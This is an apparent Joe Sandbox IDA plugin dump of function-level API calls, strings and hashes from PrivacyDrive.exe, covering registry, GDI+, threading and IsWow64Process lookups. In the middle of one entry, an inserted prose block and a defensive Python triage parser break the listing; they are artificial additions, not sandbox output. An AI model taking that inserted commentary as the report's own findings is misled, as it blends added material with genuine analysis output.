                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memsetwsprintf
                                • String ID: %c:\$<
                                • API String ID: 3493700554-478571147
                                • Opcode ID: 6084ed1ff51993e149087e6dff073fe78f30ec2c13822eaede7cfea5e037a762
                                • Instruction ID: f8c163834a8a136e8ec3b63d872f8b19b2dcb2447af848c5c16db35138203809
                                • Opcode Fuzzy Hash: 6084ed1ff51993e149087e6dff073fe78f30ec2c13822eaede7cfea5e037a762
                                • Instruction Fuzzy Hash: 3731A070A00205CFCB14EF98C948BEE7BF4BF16318F5846BAE50A9F691D775A906CB14
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memsetwsprintf
                                • String ID: %C:\$<
                                • API String ID: 3493700554-3712435599
                                • Opcode ID: 1a66108f81932dfaf5d9ae393771bdb4bcf007a754af5fc39174f002ea827423
                                • Instruction ID: c50ab5cbf75ea898c6c6c830dec49c4c10a419fac09e75cca50b364537ea767c
                                • Opcode Fuzzy Hash: 1a66108f81932dfaf5d9ae393771bdb4bcf007a754af5fc39174f002ea827423
                                • Instruction Fuzzy Hash: BE010CB5D0034DDBDB00DFD0D849BDEBBB8BB08308F50416AE505AB280EB749609DB55
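The per-function "APIs" listings in this section are easier to triage once they are parsed rather than read by eye: the call name, the module it was imported from, the stack arguments the sandbox could resolve, the "ref:" address, and whether the call sits in a subcall. The following Python script is an added example, not part of the Joe Sandbox report or of the analysed binary. It parses that line format, then applies a few triage rules that decode what this section shows: a RegCreateKeyExW against hive 80000001 (HKEY_CURRENT_USER) with access mask 0002001F (KEY_READ|KEY_WRITE), a DeviceIoControl reached through a subcall, EnumWindows with a callback, and the GetModuleHandleW/GetProcAddress pair whose string arguments name kernel32 and IsWow64Process, i.e. an import resolved at run time. The sample input is constructed by copying lines from three entries in this section (the EnumWindows entry, the registry entry, and the GetModuleHandleW entry that follows); the rule set, the helper names (`parse_listing`, `triage`, `decode_key_access`) and the finding wording are this example's own. The hive handles and KEY_* masks are the documented Windows constants.

```python
"""Parse the 'APIs' listings emitted by the Joe Sandbox IDA plugin and flag
call patterns worth a second look during triage.  Added example; only the
line format and the sample lines come from the report, the rules are ours."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line, e.g.
#   • RegCreateKeyExW.ADVAPI32(80000001,Software\Cybertron\Privacy Drive,...), ref: 004B5145
#   • Part of subcall function 004A6B80: DeviceIoControl.KERNEL32(?,07770C34,...), ref: 004A6BE6
#   • __CxxThrowException@8.LIBCMT ref: 00430501            (no argument list at all)
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")
# Predefined registry hive handles (documented Windows values).
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    string_id: str = ""


def parse_listing(text):
    """Split report text into FunctionEntry objects; each 'APIs' line opens a new one."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is None:
            continue
        elif line.startswith("• String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return entries


def decode_key_access(hexmask):
    """Name the well-known registry access masks; unexplained bits stay hex."""
    mask = int(hexmask, 16)
    if mask & KEY_ALL_ACCESS == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    parts, known = [], 0
    for name, bits in (("KEY_READ", KEY_READ), ("KEY_WRITE", KEY_WRITE)):
        if mask & bits == bits:
            parts.append(name)
            known |= bits
    if mask & ~known:
        parts.append(f"0x{mask & ~known:X}")
    return "|".join(parts) or "0"


def string_args(call):
    """Arguments the sandbox resolved to text rather than a raw 32-bit value or '?'."""
    return [a for a in call.args if a != "?" and not HEX32.fullmatch(a)]


def triage(entry):
    """Return human-readable findings for one function entry (rules are this example's own)."""
    findings = []
    names = {c.name for c in entry.calls}
    for c in entry.calls:
        where = f" (inside subcall {c.subcall_of})" if c.subcall_of else ""
        if c.name.startswith(("GetModuleHandle", "LoadLibrary")) and "GetProcAddress" in names:
            # Strings still on the stack at the module lookup show which import is resolved late.
            findings.append("dynamic API resolution: " + "!".join(string_args(c)))
        elif c.name == "RegCreateKeyExW" and len(c.args) > 5:
            # RegCreateKeyExW(hKey, lpSubKey, Reserved, lpClass, dwOptions, samDesired, ...)
            hive = HIVES.get(c.args[0], c.args[0])
            findings.append(f"registry key {hive}\\{c.args[1]} opened with {decode_key_access(c.args[5])}")
        elif c.name == "DeviceIoControl" and len(c.args) > 1:
            findings.append(f"driver communication, IOCTL 0x{c.args[1]}{where}")
        elif c.name == "EnumWindows" and c.args:
            findings.append(f"top-level window enumeration with callback {c.args[0]}{where}")
    return findings


def triage_listing(text):
    """Map each noisy entry's first call address to its findings; quiet entries are dropped."""
    out = {}
    for e in parse_listing(text):
        if e.calls and (f := triage(e)):
            out[e.calls[0].ref] = f
    return out


# Constructed sample: lines copied from three function entries in this section.
SAMPLE = r"""
APIs
• EnterCriticalSection.KERNEL32(005BE2CC,?,?,?,?,?,?,00000000,00000000), ref: 004A766C
  • Part of subcall function 004A6B80: DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
• EnumWindows.USER32(Function_00001500,?), ref: 004A778D
Strings
• String ID: list<T> too long
APIs
• RegCreateKeyExW.ADVAPI32(80000001,Software\Cybertron\Privacy Drive,?,?,?,0002001F,?,005BE250,00000000,7563D392), ref: 004B5145
• RegCloseKey.ADVAPI32(00000000), ref: 004B5223
Strings
• String ID: 4[$Software\Cybertron\Privacy Drive
APIs
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,005BDD4C,0041D3DB), ref: 004D354A
• GetProcAddress.KERNEL32(00000000), ref: 004D3551
• GetCurrentProcess.KERNEL32(005BE4E0), ref: 004D3562
"""

if __name__ == "__main__":
    for ref, findings in triage_listing(SAMPLE).items():
        print(ref, *findings, sep="\n  ")
```

Run it over the whole function-listing text of a report rather than the sample to get one line per function with a decoded hive, access mask or late-bound import name; argument positions are only trusted for calls whose prototype the rule hard-codes, since the sandbox prints whatever was on the stack and a `?` means it could not resolve that slot.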
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,005BDD4C,0041D3DB), ref: 004D354A
                                • GetProcAddress.KERNEL32(00000000), ref: 004D3551
                                • GetCurrentProcess.KERNEL32(005BE4E0), ref: 004D3562
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressCurrentHandleModuleProcProcess
                                • String ID: IsWow64Process$kernel32
                                • API String ID: 4190356694-3789238822
                                • Opcode ID: 903152296c2ea943cea53cf59f37d2001c8a9bd07ba76ec03c0ff66c12262fcd
                                • Instruction ID: 4eb353d676ab66b3e10b858cb82342fdd131ff1ba5c45fbc87e9acfb05d64e88
                                • Opcode Fuzzy Hash: 903152296c2ea943cea53cf59f37d2001c8a9bd07ba76ec03c0ff66c12262fcd
                                • Instruction Fuzzy Hash: ACF01C769413109BCF79EF64FC1AEC53BA6F724746F080A06F411D32A0C778A448EB51
                                APIs
                                • GdipCreateRegion.GDIPLUS(?,7563D392,?,?,?), ref: 004EE3C5
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 004EE4AC
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,00000000), ref: 004EE4D8
                                • GdipGetRegionBounds.GDIPLUS(00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 004EE527
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004EE54F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Region$String$BoundsCharacterCreateDeleteFormatMeasurableMeasureRanges
                                • String ID:
                                • API String ID: 2862540553-0
                                • Opcode ID: d21c68119743c5368ee9835d4fb6ca6a56a2c54fbb75767020cfc1576227397e
                                • Instruction ID: 24c2b81997005cf861c3c7e384ce6e9b24adc1cd5d3a5120f466a13335877674
                                • Opcode Fuzzy Hash: d21c68119743c5368ee9835d4fb6ca6a56a2c54fbb75767020cfc1576227397e
                                • Instruction Fuzzy Hash: DA5179B1900209EFDB14CF96D894BDEBBB4FF49305F10861AE416BB290D775A908CFA4
                                APIs
                                  • Part of subcall function 004A83C0: _memset.LIBCMT ref: 004A83E7
                                  • Part of subcall function 004A83C0: _memset.LIBCMT ref: 004A8486
                                  • Part of subcall function 004A83C0: GetVersionExW.KERNEL32(00000114,?,00000110,005BDDE8,00000000,000003B8), ref: 004A8495
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • InitializeCriticalSection.KERNEL32(005BE2CC,?,?,?,?,000000FF,?,00401225), ref: 00475679
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memset$CriticalInitializeSectionVersion
                                • String ID: !@$4[$[$[
                                • API String ID: 1439776824-573984393
                                • Opcode ID: f6cdcf9e5209f496280de21f878bea33775a3dfe0d11f000bee28cbae6e171dd
                                • Instruction ID: dbf5fe5d0be854726b5789bbc29cf0d9a9f6ef3976c8143a628423fa3c4f3b26
                                • Opcode Fuzzy Hash: f6cdcf9e5209f496280de21f878bea33775a3dfe0d11f000bee28cbae6e171dd
                                • Instruction Fuzzy Hash: EC6110B4805385DED780CF68E919799BFF4BB25308F14465DD0849B3A1E3B9360CEBA5
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0C1E
                                  • Part of subcall function 00496130: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004961BB
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0C50
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0D22
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0D41
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID:
                                • API String ID: 2222842502-0
                                • Opcode ID: 1f116de3a47cf7a54eeb36d370a3b235255416f006492a93511ae256617e7dff
                                • Instruction ID: a30a1b573ef29b5b96af9d62f7259acb422750a5e2e9245828b27b54f58e7c0f
                                • Opcode Fuzzy Hash: 1f116de3a47cf7a54eeb36d370a3b235255416f006492a93511ae256617e7dff
                                • Instruction Fuzzy Hash: 7041C534A103049FE724DB98CC4AFE677A9AF40705F18417EE605AF2D2CB697805CB79
                                APIs
                                • EnterCriticalSection.KERNEL32(?,7563D392,?,?,?,7563D392), ref: 0040EAD4
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040EAFE
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 0040EB15
                                • CloseHandle.KERNEL32(00000000), ref: 0040EB37
                                  • Part of subcall function 0040EBC0: SetEvent.KERNEL32(?,?,0040EAF4), ref: 0040EBCD
                                  • Part of subcall function 0040EBC0: Sleep.KERNEL32(0000000A,?,?,0040EAF4), ref: 0040EBE2
                                • LeaveCriticalSection.KERNEL32(?), ref: 0040EBA3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$CloseEnterEventHandleLeaveObjectSingleSleepTerminateThreadWait
                                • String ID:
                                • API String ID: 2406323708-0
                                • Opcode ID: 1379cd60b4a5ee7837ccced63a34ce483ddc240657569a269f744bfa56d5bbd3
                                • Instruction ID: 96cd679fe5e2841fb83fed345f25171e71f902508a63437040f38c90d22f781c
                                • Opcode Fuzzy Hash: 1379cd60b4a5ee7837ccced63a34ce483ddc240657569a269f744bfa56d5bbd3
                                • Instruction Fuzzy Hash: 7F316CB5901705DBCB20CF66D808B5AFBF8FF05724F104A2EE466A3AD0C778A954CB95
                                APIs
                                • LoadCursorW.USER32(00000000,00007F02), ref: 004CE601
                                • SetCursor.USER32(00000000), ref: 004CE608
                                • LoadCursorW.USER32(00000000,00007F02), ref: 004CE649
                                • SetCursor.USER32(00000000), ref: 004CE650
                                • IsWindow.USER32(00000000), ref: 004CE6A3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Cursor$Load$Window
                                • String ID:
                                • API String ID: 373611324-0
                                • Opcode ID: 80d91b399186214c2651975e6940cc0bbb9066883ef3d4eb70c98f20f680720f
                                • Instruction ID: 267e152b442c7c50a868fcf03e1327f48bcbf66dd67a20fd02bcc9c93849e241
                                • Opcode Fuzzy Hash: 80d91b399186214c2651975e6940cc0bbb9066883ef3d4eb70c98f20f680720f
                                • Instruction Fuzzy Hash: CA21BD38350300EBEB755B26C909F7A7394BF20B05F84041EF6429A2C0CBB8A841DB5D
                                APIs
                                • _malloc.LIBCMT ref: 0050E365
                                  • Part of subcall function 00500F9C: __FF_MSGBANNER.LIBCMT ref: 00500FB3
                                  • Part of subcall function 00500F9C: __NMSG_WRITE.LIBCMT ref: 00500FBA
                                  • Part of subcall function 00500F9C: HeapAlloc.KERNEL32(?,00000000,00000001,?,?,?,?,004FFD1B,?,7563D392), ref: 00500FDF
                                • _free.LIBCMT ref: 0050E378
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocHeap_free_malloc
                                • String ID:
                                • API String ID: 2734353464-0
                                • Opcode ID: 76d684e341c728009a91389e18dedc87e07ec3a22d4821cbdf9cb951d379d52c
                                • Instruction ID: 90c6dda660f17eee0961a91b50970eb708e17461c93d32334f97f4849b3dc1ec
                                • Opcode Fuzzy Hash: 76d684e341c728009a91389e18dedc87e07ec3a22d4821cbdf9cb951d379d52c
                                • Instruction Fuzzy Hash: 3A11A336508B17ABCB213B74AC4A69E3F99BF50361F304D25F9099B1E1EB74A8409B94
                                APIs
                                • LoadImageW.USER32(?,9015FF56,00000001,00000000,00000000,00000000), ref: 004A88FC
                                • DestroyIcon.USER32(00000000,?,004A6EBB,0000008C), ref: 004A8910
                                • DestroyIcon.USER32(00000000,?,004A6EBB,0000008C), ref: 004A8937
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DestroyIcon$ImageLoad
                                • String ID:
                                • API String ID: 2072966803-0
                                • Opcode ID: 5fbff504c426228288b781d8390ea03c8d9c0093c7f46b6ed690fb1a758187bb
                                • Instruction ID: da45c423426458ab6a0a238f7bb99dc166bc3e05a4018f4358c60fd1bd14c7a3
                                • Opcode Fuzzy Hash: 5fbff504c426228288b781d8390ea03c8d9c0093c7f46b6ed690fb1a758187bb
                                • Instruction Fuzzy Hash: F4014F72200310DBD7205B99EC08BE7F7ECEB61B62F00402BF645D71A0C6B56948DBE5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 498bd7e8d8ab5aedfa992c99d6e4fcdc811703f614c4ef557d89a7882a801635
                                • Instruction ID: c13d8002d9a48abe8ce0c21eadc1977aca9ba67ba95ebffee4780369b024578c
                                • Opcode Fuzzy Hash: 498bd7e8d8ab5aedfa992c99d6e4fcdc811703f614c4ef557d89a7882a801635
                                • Instruction Fuzzy Hash: E6C15171700205DBCB14CF58C5D48AEB7B6FF85304720493EE442AB295D738ED66CB9A
                                APIs
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,?,00000288), ref: 004B42C9
                                  • Part of subcall function 004B3610: FindClose.KERNEL32(00000000,7563D392,0040FFE5,005BE234,?,?,?,0054A882,000000FF,?,004B424C,?), ref: 004B3687
                                  • Part of subcall function 004B3610: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004B3720
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseFileFindQueryReadValue
                                • String ID: !@$%sPortable.xml$aes
                                • API String ID: 1808956909-4193344564
                                • Opcode ID: 01d5c5a24089f0c1a0fae5e8ec9ceb500feb15f0ec43c3dd4ae035b4ea993f7a
                                • Instruction ID: 6f1b460700e761cc4abc6efbcd98f60330be9bf1a8f82da461a7fdec2389ad11
                                • Opcode Fuzzy Hash: 01d5c5a24089f0c1a0fae5e8ec9ceb500feb15f0ec43c3dd4ae035b4ea993f7a
                                • Instruction Fuzzy Hash: 99A1A570900218AFDB20DF64CC49BEEBBB4BF04718F50419AE509B7282DB785B88CF65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
